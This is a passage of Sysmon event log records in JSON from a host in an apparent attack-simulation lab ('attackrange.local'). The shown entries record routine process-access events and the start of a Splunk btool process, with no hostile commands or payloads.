{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3155,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.340\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.340","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3156,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.340\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.340","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3157,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.340\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.340","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3158,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.340\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.340","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3159,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.340\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.340","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3160,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.340\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.340","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3161,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.340\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.340","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3162,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.340\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-00101C210500}\r\nTargetProcessId: 2496\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.340","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-00101C210500}","TargetProcessId":"2496","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3163,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.351\r\nProcessGuid: {A837DB8D-0239-5F25-0000-0010DB210500}\r\nProcessId: 3364\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  web list settings --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-00101C210500}\r\nParentProcessId: 